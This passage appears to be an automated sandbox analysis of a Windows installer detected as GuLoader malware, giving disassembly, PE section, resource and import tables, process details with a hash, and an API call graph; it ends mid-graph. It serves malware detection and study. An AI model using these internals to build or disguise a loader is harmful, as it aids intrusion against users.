                                              mov ecx, dword ptr [ebp-00000112h]
                                              sub ax, 00000053h
                                              add ecx, FFFFFFD0h
                                              neg ax
                                              sbb eax, eax
                                              mov byte ptr [ebp-26h], 00000004h
                                              not eax
                                              and eax, ecx
                                              mov word ptr [ebp-2Ch], ax
                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                              jnc 00007FE5D913700Ah
                                              and word ptr [ebp-00000132h], 0000h
                                              mov eax, dword ptr [ebp-00000134h]
                                              movzx ecx, byte ptr [ebp-00000138h]
                                              mov dword ptr [0042A2D8h], eax
                                              xor eax, eax
                                              mov ah, byte ptr [ebp-0000013Ch]
                                              movzx eax, ax
                                              or eax, ecx
                                              xor ecx, ecx
                                              mov ch, byte ptr [ebp-2Ch]
                                              movzx ecx, cx
                                              shl eax, 10h
                                              or eax, ecx
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x31a50.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x4af680x1dd0.ndata
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x65150x6600False0.6615349264705882data6.439707948554623IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x139a0x1400False0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x203380x600False0.4993489583333333data4.013698650446401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x2b0000x250000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x500000x31a500x31c00False0.47981607255025127data6.055190439227351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x503400x10a00dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                              RT_ICON0x60d400x9600dataEnglishUnited States
                                              RT_ICON0x6a3400x8e00PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                              RT_ICON0x731400x5600dataEnglishUnited States
                                              RT_ICON0x787400x4400dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 252, next used block 1056964608EnglishUnited States
                                              RT_ICON0x7cb400x2600dataEnglishUnited States
                                              RT_ICON0x7f1400x1200dataEnglishUnited States
                                              RT_ICON0x803400xa00dataEnglishUnited States
                                              RT_ICON0x80d400x600GLS_BINARY_LSB_FIRSTEnglishUnited States
                                              RT_DIALOG0x813400x100dataEnglishUnited States
                                              RT_DIALOG0x814400x11cdataEnglishUnited States
                                              RT_DIALOG0x815600xc4dataEnglishUnited States
                                              RT_DIALOG0x816280x60dataEnglishUnited States
                                              RT_GROUP_ICON0x816880x84dataEnglishUnited States
                                              RT_MANIFEST0x817100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                              DLLImport
                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              No network behavior found

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Target ID:0
                                              Start time:13:05:10
                                              Start date:05/08/2022
                                              Path:C:\Users\user\Desktop\xKBLVUHoY6.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\xKBLVUHoY6.exe"
                                              Imagebase:0x400000
                                              File size:314680 bytes
                                              MD5 hash:6E0BF5D5220FBE4F7245653A259C7DAD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.753579119.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:18.3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:16.3%
                                                Total number of Nodes:1598
                                                Total number of Limit Nodes:37
                                                execution_graph 4213 401941 4214 401943 4213->4214 4219 402da6 4214->4219 4220 402db2 4219->4220 4264 406544 4220->4264 4223 401948 4225 405c13 4223->4225 4306 405ede 4225->4306 4228 405c52 4231 405d72 4228->4231 4320 406507 lstrcpynW 4228->4320 4229 405c3b DeleteFileW 4230 401951 4229->4230 4231->4230 4349 40683d FindFirstFileW 4231->4349 4233 405c78 4234 405c8b 4233->4234 4235 405c7e lstrcatW 4233->4235 4321 405e22 lstrlenW 4234->4321 4236 405c91 4235->4236 4239 405ca1 lstrcatW 4236->4239 4241 405cac lstrlenW FindFirstFileW 4236->4241 4239->4241 4241->4231 4249 405cce 4241->4249 4242 405d9b 4352 405dd6 lstrlenW CharPrevW 4242->4352 4245 405d55 FindNextFileW 4245->4249 4250 405d6b FindClose 4245->4250 4246 405bcb 5 API calls 4248 405dad 4246->4248 4251 405db1 4248->4251 4252 405dc7 4248->4252 4249->4245 4260 405d16 4249->4260 4325 406507 lstrcpynW 4249->4325 4250->4231 4251->4230 4255 405569 24 API calls 4251->4255 4254 405569 24 API calls 4252->4254 4254->4230 4257 405dbe 4255->4257 4256 405c13 60 API calls 4256->4260 4259 4062c7 36 API calls 4257->4259 4258 405569 24 API calls 4258->4245 4261 405dc5 4259->4261 4260->4245 4260->4256 4260->4258 4326 405bcb 4260->4326 4334 405569 4260->4334 4345 4062c7 MoveFileExW 4260->4345 4261->4230 4279 406551 4264->4279 4265 406774 4266 402dd3 4265->4266 4297 406507 lstrcpynW 4265->4297 4266->4223 4281 40678e 4266->4281 4268 406742 lstrlenW 4268->4279 4269 406659 GetSystemDirectoryW 4269->4279 4273 406544 10 API calls 4273->4268 4274 40666c GetWindowsDirectoryW 4274->4279 4275 40669b SHGetSpecialFolderLocation 4275->4279 4280 4066b3 SHGetPathFromIDListW CoTaskMemFree 4275->4280 4276 4066e3 lstrcatW 4276->4279 4277 406544 10 API calls 4277->4279 4278 40678e 5 API calls 4278->4279 4279->4265 4279->4268 4279->4269 4279->4273 4279->4274 4279->4275 4279->4276 4279->4277 4279->4278 4290 4063d5 4279->4290 4295 40644e wsprintfW 4279->4295 4296 406507 lstrcpynW 4279->4296 4280->4279 4287 40679b 4281->4287 4282 406811 4283 406816 CharPrevW 4282->4283 4285 406837 4282->4285 4283->4282 4284 406804 CharNextW 4284->4282 4284->4287 4285->4223 4287->4282 4287->4284 4288 4067f0 CharNextW 4287->4288 4289 4067ff CharNextW 4287->4289 4302 405e03 4287->4302 4288->4287 4289->4284 4298 406374 4290->4298 4293 406439 4293->4279 4294 406409 RegQueryValueExW RegCloseKey 4294->4293 4295->4279 4296->4279 4297->4266 4299 406383 4298->4299 4300 406387 4299->4300 4301 40638c RegOpenKeyExW 4299->4301 4300->4293 4300->4294 4301->4300 4303 405e09 4302->4303 4304 405e1f 4303->4304 4305 405e10 CharNextW 4303->4305 4304->4287 4305->4303 4355 406507 lstrcpynW 4306->4355 4308 405eef 4356 405e81 CharNextW CharNextW 4308->4356 4311 405c33 4311->4228 4311->4229 4312 40678e 5 API calls 4318 405f05 4312->4318 4313 405f36 lstrlenW 4314 405f41 4313->4314 4313->4318 4315 405dd6 3 API calls 4314->4315 4317 405f46 GetFileAttributesW 4315->4317 4316 40683d 2 API calls 4316->4318 4317->4311 4318->4311 4318->4313 4318->4316 4319 405e22 2 API calls 4318->4319 4319->4313 4320->4233 4322 405e30 4321->4322 4323 405e42 4322->4323 4324 405e36 CharPrevW 4322->4324 4323->4236 4324->4322 4324->4323 4325->4249 4362 405fd2 GetFileAttributesW 4326->4362 4329 405be6 RemoveDirectoryW 4332 405bf4 4329->4332 4330 405bee DeleteFileW 4330->4332 4331 405bf8 4331->4260 4332->4331 4333 405c04 SetFileAttributesW 4332->4333 4333->4331 4335 405584 4334->4335 4344 405626 4334->4344 4336 4055a0 lstrlenW 4335->4336 4337 406544 17 API calls 4335->4337 4338 4055c9 4336->4338 4339 4055ae lstrlenW 4336->4339 4337->4336 4341 4055dc 4338->4341 4342 4055cf SetWindowTextW 4338->4342 4340 4055c0 lstrcatW 4339->4340 4339->4344 4340->4338 4343 4055e2 SendMessageW SendMessageW SendMessageW 4341->4343 4341->4344 4342->4341 4343->4344 4344->4260 4346 4062e8 4345->4346 4347 4062db 4345->4347 4346->4260 4365 40614d 4347->4365 4350 406853 FindClose 4349->4350 4351 405d97 4349->4351 4350->4351 4351->4230 4351->4242 4353 405df2 lstrcatW 4352->4353 4354 405da1 4352->4354 4353->4354 4354->4246 4355->4308 4357 405eb0 4356->4357 4358 405e9e 4356->4358 4360 405e03 CharNextW 4357->4360 4361 405ed4 4357->4361 4358->4357 4359 405eab CharNextW 4358->4359 4359->4361 4360->4357 4361->4311 4361->4312 4363 405bd7 4362->4363 4364 405fe4 SetFileAttributesW 4362->4364 4363->4329 4363->4330 4363->4331 4364->4363 4366 4061a3 GetShortPathNameW 4365->4366 4367 40617d 4365->4367 4369 4062c2 4366->4369 4370 4061b8 4366->4370 4392 405ff7 GetFileAttributesW CreateFileW 4367->4392 4369->4346 4370->4369 4372 4061c0 wsprintfA 4370->4372 4371 406187 CloseHandle GetShortPathNameW 4371->4369 4373 40619b 4371->4373 4374 406544 17 API calls 4372->4374 4373->4366 4373->4369 4375 4061e8 4374->4375 4393 405ff7 GetFileAttributesW CreateFileW 4375->4393 4377 4061f5 4377->4369 4378 406204 GetFileSize GlobalAlloc 4377->4378 4379 406226 4378->4379 4380 4062bb CloseHandle 4378->4380 4394 40607a ReadFile 4379->4394 4380->4369 4385 406245 lstrcpyA 4388 406267 4385->4388 4386 406259 4387 405f5c 4 API calls 4386->4387 4387->4388 4389 40629e SetFilePointer 4388->4389 4401 4060a9 WriteFile 4389->4401 4392->4371 4393->4377 4395 406098 4394->4395 4395->4380 4396 405f5c lstrlenA 4395->4396 4397 405f9d lstrlenA 4396->4397 4398 405fa5 4397->4398 4399 405f76 lstrcmpiA 4397->4399 4398->4385 4398->4386 4399->4398 4400 405f94 CharNextA 4399->4400 4400->4397 4402 4060c7 GlobalFree 4401->4402 4402->4380 4403 4015c1 4404 402da6 17 API calls 4403->4404 4405 4015c8 4404->4405 4406 405e81 4 API calls 4405->4406 4412 4015d1 4406->4412 4407 401631 4409 401663 4407->4409 4410 401636 4407->4410 4408 405e03 CharNextW 4408->4412 4414 401423 24 API calls 4409->4414 4430 401423 4410->4430 4412->4407 4412->4408 4419 401617 GetFileAttributesW 4412->4419 4422 405ad2 4412->4422 4425 405a38 CreateDirectoryW 4412->4425 4434 405ab5 CreateDirectoryW 4412->4434 4420 40165b 4414->4420 4418 40164a SetCurrentDirectoryW 4418->4420 4419->4412 4437 4068d4 GetModuleHandleA 4422->4437 4426 405a85 4425->4426 4427 405a89 GetLastError 4425->4427 4426->4412 4427->4426 4428 405a98 SetFileSecurityW 4427->4428 4428->4426 4429 405aae GetLastError 4428->4429 4429->4426 4431 405569 24 API calls 4430->4431 4432 401431 4431->4432 4433 406507 lstrcpynW 4432->4433 4433->4418 4435 405ac5 4434->4435 4436 405ac9 GetLastError 4434->4436 4435->4412 4436->4435 4438 4068f0 4437->4438 4439 4068fa GetProcAddress 4437->4439 4443 406864 GetSystemDirectoryW 4438->4443 4441 405ad9 4439->4441 4441->4412 4442 4068f6 4442->4439 4442->4441 4445 406886 wsprintfW LoadLibraryExW 4443->4445 4445->4442 5209 401c43 5210 402d84 17 API calls 5209->5210 5211 401c4a 5210->5211 5212 402d84 17 API calls 5211->5212 5213 401c57 5212->5213 5214 401c6c 5213->5214 5215 402da6 17 API calls 5213->5215 5216 401c7c 5214->5216 5217 402da6 17 API calls 5214->5217 5215->5214 5218 401cd3 5216->5218 5219 401c87 5216->5219 5217->5216 5220 402da6 17 API calls 5218->5220 5221 402d84 17 API calls 5219->5221 5222 401cd8 5220->5222 5223 401c8c 5221->5223 5224 402da6 17 API calls 5222->5224 5225 402d84 17 API calls 5223->5225 5227 401ce1 FindWindowExW 5224->5227 5226 401c98 5225->5226 5228 401cc3 SendMessageW 5226->5228 5229 401ca5 SendMessageTimeoutW 5226->5229 5230 401d03 5227->5230 5228->5230 5229->5230 5231 4028c4 5232 4028ca 5231->5232 5233 4028d2 FindClose 5232->5233 5234 402c2a 5232->5234 5233->5234 5235 6eb8103d 5238 6eb8101b 5235->5238 5245 6eb815b6 5238->5245 5240 6eb81020 5241 6eb81024 5240->5241 5242 6eb81027 GlobalAlloc 5240->5242 5243 6eb815dd 3 API calls 5241->5243 5242->5241 5244 6eb8103b 5243->5244 5246 6eb815bc 5245->5246 5247 6eb815c2 5246->5247 5248 6eb815ce GlobalFree 5246->5248 5247->5240 5248->5240 5259 4016cc 5260 402da6 17 API calls 5259->5260 5261 4016d2 GetFullPathNameW 5260->5261 5262 4016ec 5261->5262 5268 40170e 5261->5268 5264 40683d 2 API calls 5262->5264 5262->5268 5263 401723 GetShortPathNameW 5265 402c2a 5263->5265 5266 4016fe 5264->5266 5266->5268 5269 406507 lstrcpynW 5266->5269 5268->5263 5268->5265 5269->5268 5270 401e4e GetDC 5271 402d84 17 API calls 5270->5271 5272 401e60 GetDeviceCaps MulDiv ReleaseDC 5271->5272 5273 402d84 17 API calls 5272->5273 5274 401e91 5273->5274 5275 406544 17 API calls 5274->5275 5276 401ece CreateFontIndirectW 5275->5276 5277 402638 5276->5277 5278 402950 5279 402da6 17 API calls 5278->5279 5281 40295c 5279->5281 5280 402972 5283 405fd2 2 API calls 5280->5283 5281->5280 5282 402da6 17 API calls 5281->5282 5282->5280 5284 402978 5283->5284 5306 405ff7 GetFileAttributesW CreateFileW 5284->5306 5286 402985 5287 402a3b 5286->5287 5288 4029a0 GlobalAlloc 5286->5288 5289 402a23 5286->5289 5290 402a42 DeleteFileW 5287->5290 5291 402a55 5287->5291 5288->5289 5292 4029b9 5288->5292 5293 4032b4 35 API calls 5289->5293 5290->5291 5307 4034af SetFilePointer 5292->5307 5295 402a30 CloseHandle 5293->5295 5295->5287 5296 4029bf 5297 403499 ReadFile 5296->5297 5298 4029c8 GlobalAlloc 5297->5298 5299 4029d8 5298->5299 5300 402a0c 5298->5300 5302 4032b4 35 API calls 5299->5302 5301 4060a9 WriteFile 5300->5301 5303 402a18 GlobalFree 5301->5303 5305 4029e5 5302->5305 5303->5289 5304 402a03 GlobalFree 5304->5300 5305->5304 5306->5286 5307->5296 5308 404ed0 GetDlgItem GetDlgItem 5309 404f22 7 API calls 5308->5309 5315 405147 5308->5315 5310 404fc9 DeleteObject 5309->5310 5311 404fbc SendMessageW 5309->5311 5312 404fd2 5310->5312 5311->5310 5313 405009 5312->5313 5316 406544 17 API calls 5312->5316 5317 404463 18 API calls 5313->5317 5314 4052d5 5320 4052e7 5314->5320 5321 4052df SendMessageW 5314->5321 5319 405229 5315->5319 5348 4051b6 5315->5348 5362 404e1e SendMessageW 5315->5362 5322 404feb SendMessageW SendMessageW 5316->5322 5318 40501d 5317->5318 5323 404463 18 API calls 5318->5323 5319->5314 5324 405282 SendMessageW 5319->5324 5347 40513a 5319->5347 5327 405310 5320->5327 5331 405300 5320->5331 5332 4052f9 ImageList_Destroy 5320->5332 5321->5320 5322->5312 5337 40502e 5323->5337 5329 405297 SendMessageW 5324->5329 5324->5347 5325 40521b SendMessageW 5325->5319 5326 4044ca 8 API calls 5330 4054d6 5326->5330 5336 40548a 5327->5336 5355 40534b 5327->5355 5367 404e9e 5327->5367 5335 4052aa 5329->5335 5331->5327 5333 405309 GlobalFree 5331->5333 5332->5331 5333->5327 5334 405109 GetWindowLongW SetWindowLongW 5339 405122 5334->5339 5344 4052bb SendMessageW 5335->5344 5338 40549c ShowWindow GetDlgItem ShowWindow 5336->5338 5336->5347 5337->5334 5343 405081 SendMessageW 5337->5343 5345 405104 5337->5345 5349 4050d3 SendMessageW 5337->5349 5350 4050bf SendMessageW 5337->5350 5338->5347 5340 405127 ShowWindow 5339->5340 5341 40513f 5339->5341 5360 404498 SendMessageW 5340->5360 5361 404498 SendMessageW 5341->5361 5343->5337 5344->5314 5345->5334 5345->5339 5347->5326 5348->5319 5348->5325 5349->5337 5350->5337 5352 405455 5353 405460 InvalidateRect 5352->5353 5356 40546c 5352->5356 5353->5356 5354 405379 SendMessageW 5359 40538f 5354->5359 5355->5354 5355->5359 5356->5336 5376 404dd9 5356->5376 5358 405403 SendMessageW SendMessageW 5358->5359 5359->5352 5359->5358 5360->5347 5361->5315 5363 404e41 GetMessagePos ScreenToClient SendMessageW 5362->5363 5364 404e7d SendMessageW 5362->5364 5365 404e7a 5363->5365 5366 404e75 5363->5366 5364->5366 5365->5364 5366->5348 5379 406507 lstrcpynW 5367->5379 5369 404eb1 5380 40644e wsprintfW 5369->5380 5371 404ebb 5372 40140b 2 API calls 5371->5372 5373 404ec4 5372->5373 5381 406507 lstrcpynW 5373->5381 5375 404ecb 5375->5355 5382 404d10 5376->5382 5378 404dee 5378->5336 5379->5369 5380->5371 5381->5375 5383 404d29 5382->5383 5384 406544 17 API calls 5383->5384 5385 404d8d 5384->5385 5386 406544 17 API calls 5385->5386 5387 404d98 5386->5387 5388 406544 17 API calls 5387->5388 5389 404dae lstrlenW wsprintfW SetDlgItemTextW 5388->5389 5389->5378 5390 4045d3 lstrlenW 5391 4045f2 5390->5391 5392 4045f4 WideCharToMultiByte 5390->5392 5391->5392 5393 404954 5394 404980 5393->5394 5395 404991 5393->5395 5454 405b4b GetDlgItemTextW 5394->5454 5397 40499d GetDlgItem 5395->5397 5400 4049fc 5395->5400 5399 4049b1 5397->5399 5398 40498b 5401 40678e 5 API calls 5398->5401 5402 4049c5 SetWindowTextW 5399->5402 5405 405e81 4 API calls 5399->5405 5407 406544 17 API calls 5400->5407 5415 404ae0 5400->5415 5452 404c8f 5400->5452 5401->5395 5406 404463 18 API calls 5402->5406 5404 4044ca 8 API calls 5409 404ca3 5404->5409 5410 4049bb 5405->5410 5411 4049e1 5406->5411 5412 404a70 SHBrowseForFolderW 5407->5412 5408 404b10 5413 405ede 18 API calls 5408->5413 5410->5402 5420 405dd6 3 API calls 5410->5420 5414 404463 18 API calls 5411->5414 5412->5415 5416 404a88 CoTaskMemFree 5412->5416 5417 404b16 5413->5417 5418 4049ef 5414->5418 5415->5452 5456 405b4b GetDlgItemTextW 5415->5456 5419 405dd6 3 API calls 5416->5419 5457 406507 lstrcpynW 5417->5457 5455 404498 SendMessageW 5418->5455 5422 404a95 5419->5422 5420->5402 5425 404acc SetDlgItemTextW 5422->5425 5429 406544 17 API calls 5422->5429 5424 4049f5 5427 4068d4 5 API calls 5424->5427 5425->5415 5426 404b2d 5428 4068d4 5 API calls 5426->5428 5427->5400 5436 404b34 5428->5436 5430 404ab4 lstrcmpiW 5429->5430 5430->5425 5433 404ac5 lstrcatW 5430->5433 5431 404b75 5458 406507 lstrcpynW 5431->5458 5433->5425 5434 404b7c 5435 405e81 4 API calls 5434->5435 5437 404b82 GetDiskFreeSpaceW 5435->5437 5436->5431 5440 405e22 2 API calls 5436->5440 5442 404bcd 5436->5442 5439 404ba6 MulDiv 5437->5439 5437->5442 5439->5442 5440->5436 5441 404c3e 5444 404c61 5441->5444 5446 40140b 2 API calls 5441->5446 5442->5441 5443 404dd9 20 API calls 5442->5443 5445 404c2b 5443->5445 5459 404485 KiUserCallbackDispatcher 5444->5459 5448 404c40 SetDlgItemTextW 5445->5448 5449 404c30 5445->5449 5446->5444 5448->5441 5451 404d10 20 API calls 5449->5451 5450 404c7d 5450->5452 5460 4048ad 5450->5460 5451->5441 5452->5404 5454->5398 5455->5424 5456->5408 5457->5426 5458->5434 5459->5450 5461 4048c0 SendMessageW 5460->5461 5462 4048bb 5460->5462 5461->5452 5462->5461 5463 401956 5464 402da6 17 API calls 5463->5464 5465 40195d lstrlenW 5464->5465 5466 402638 5465->5466 4759 4014d7 4764 402d84 4759->4764 4761 4014dd Sleep 4763 402c2a 4761->4763 4765 406544 17 API calls 4764->4765 4766 402d99 4765->4766 4766->4761 5001 4020d8 5002 40219c 5001->5002 5003 4020ea 5001->5003 5006 401423 24 API calls 5002->5006 5004 402da6 17 API calls 5003->5004 5005 4020f1 5004->5005 5007 402da6 17 API calls 5005->5007 5012 4022f6 5006->5012 5008 4020fa 5007->5008 5009 402110 LoadLibraryExW 5008->5009 5010 402102 GetModuleHandleW 5008->5010 5009->5002 5011 402121 5009->5011 5010->5009 5010->5011 5024 406943 5011->5024 5015 402132 5018 402151 5015->5018 5019 40213a 5015->5019 5016 40216b 5017 405569 24 API calls 5016->5017 5021 402142 5017->5021 5029 6eb81817 5018->5029 5020 401423 24 API calls 5019->5020 5020->5021 5021->5012 5022 40218e FreeLibrary 5021->5022 5022->5012 5071 406529 WideCharToMultiByte 5024->5071 5026 406960 5027 406967 GetProcAddress 5026->5027 5028 40212c 5026->5028 5027->5028 5028->5015 5028->5016 5030 6eb8184a 5029->5030 5072 6eb81bff 5030->5072 5032 6eb81851 5033 6eb81976 5032->5033 5034 6eb81869 5032->5034 5035 6eb81862 5032->5035 5033->5021 5106 6eb82480 5034->5106 5122 6eb8243e 5035->5122 5040 6eb818cd 5046 6eb8191e 5040->5046 5047 6eb818d3 5040->5047 5041 6eb818af 5135 6eb82655 5041->5135 5042 6eb81898 5056 6eb8188e 5042->5056 5132 6eb82e23 5042->5132 5043 6eb8187f 5045 6eb81885 5043->5045 5050 6eb81890 5043->5050 5045->5056 5116 6eb82b98 5045->5116 5048 6eb82655 10 API calls 5046->5048 5154 6eb81666 5047->5154 5054 6eb8190f 5048->5054 5049 6eb818b5 5146 6eb81654 5049->5146 5126 6eb82810 5050->5126 5070 6eb81965 5054->5070 5160 6eb82618 5054->5160 5056->5040 5056->5041 5060 6eb81896 5060->5056 5061 6eb82655 10 API calls 5061->5054 5065 6eb8196f GlobalFree 5065->5033 5067 6eb81951 5067->5070 5164 6eb815dd wsprintfW 5067->5164 5068 6eb8194a FreeLibrary 5068->5067 5070->5033 5070->5065 5071->5026 5167 6eb812bb GlobalAlloc 5072->5167 5074 6eb81c26 5168 6eb812bb GlobalAlloc 5074->5168 5076 6eb81e6b GlobalFree GlobalFree GlobalFree 5078 6eb81e88 5076->5078 5094 6eb81ed2 5076->5094 5077 6eb81c31 5077->5076 5079 6eb81d26 GlobalAlloc 5077->5079 5084 6eb81d71 lstrcpyW 5077->5084 5085 6eb81d8f GlobalFree 5077->5085 5087 6eb81d7b lstrcpyW 5077->5087 5090 6eb82126 5077->5090 5077->5094 5097 6eb82067 GlobalFree 5077->5097 5098 6eb81dcd 5077->5098 5099 6eb821ae 5077->5099 5101 6eb812cc 2 API calls 5077->5101 5080 6eb8227e 5078->5080 5088 6eb81e9d 5078->5088 5078->5094 5079->5077 5081 6eb822a0 GetModuleHandleW 5080->5081 5080->5094 5082 6eb822b1 LoadLibraryW 5081->5082 5083 6eb822c6 5081->5083 5082->5083 5082->5094 5175 6eb816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5083->5175 5084->5087 5085->5077 5087->5077 5088->5094 5171 6eb812cc 5088->5171 5089 6eb82318 5093 6eb82325 lstrlenW 5089->5093 5089->5094 5174 6eb812bb GlobalAlloc 5090->5174 5176 6eb816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5093->5176 5094->5032 5095 6eb822d8 5095->5089 5104 6eb82302 GetProcAddress 5095->5104 5097->5077 5098->5077 5169 6eb8162f GlobalSize GlobalAlloc 5098->5169 5099->5094 5103 6eb82216 lstrcpyW 5099->5103 5100 6eb8233f 5100->5094 5101->5077 5103->5094 5104->5089 5105 6eb8212f 5105->5032 5107 6eb82498 5106->5107 5109 6eb825c1 GlobalFree 5107->5109 5111 6eb8256b GlobalAlloc CLSIDFromString 5107->5111 5112 6eb82540 GlobalAlloc WideCharToMultiByte 5107->5112 5113 6eb812cc GlobalAlloc lstrcpynW 5107->5113 5115 6eb8258a 5107->5115 5178 6eb8135a 5107->5178 5109->5107 5110 6eb8186f 5109->5110 5110->5042 5110->5043 5110->5056 5111->5109 5112->5109 5113->5107 5115->5109 5182 6eb827a4 5115->5182 5118 6eb82baa 5116->5118 5117 6eb82c4f VirtualAlloc 5121 6eb82c6d 5117->5121 5118->5117 5120 6eb82d39 5120->5056 5185 6eb82b42 5121->5185 5123 6eb82453 5122->5123 5124 6eb8245e GlobalAlloc 5123->5124 5125 6eb81868 5123->5125 5124->5123 5125->5034 5130 6eb82840 5126->5130 5127 6eb828db GlobalAlloc 5131 6eb828fe 5127->5131 5128 6eb828ee 5129 6eb828f4 GlobalSize 5128->5129 5128->5131 5129->5131 5130->5127 5130->5128 5131->5060 5133 6eb82e2e 5132->5133 5134 6eb82e6e GlobalFree 5133->5134 5189 6eb812bb GlobalAlloc 5135->5189 5137 6eb826d8 MultiByteToWideChar 5143 6eb8265f 5137->5143 5138 6eb826fa StringFromGUID2 5138->5143 5139 6eb8270b lstrcpynW 5139->5143 5140 6eb82742 GlobalFree 5140->5143 5141 6eb8271e wsprintfW 5141->5143 5142 6eb82777 GlobalFree 5142->5049 5143->5137 5143->5138 5143->5139 5143->5140 5143->5141 5143->5142 5144 6eb81312 2 API calls 5143->5144 5190 6eb81381 5143->5190 5144->5143 5194 6eb812bb GlobalAlloc 5146->5194 5148 6eb81659 5149 6eb81666 2 API calls 5148->5149 5150 6eb81663 5149->5150 5151 6eb81312 5150->5151 5152 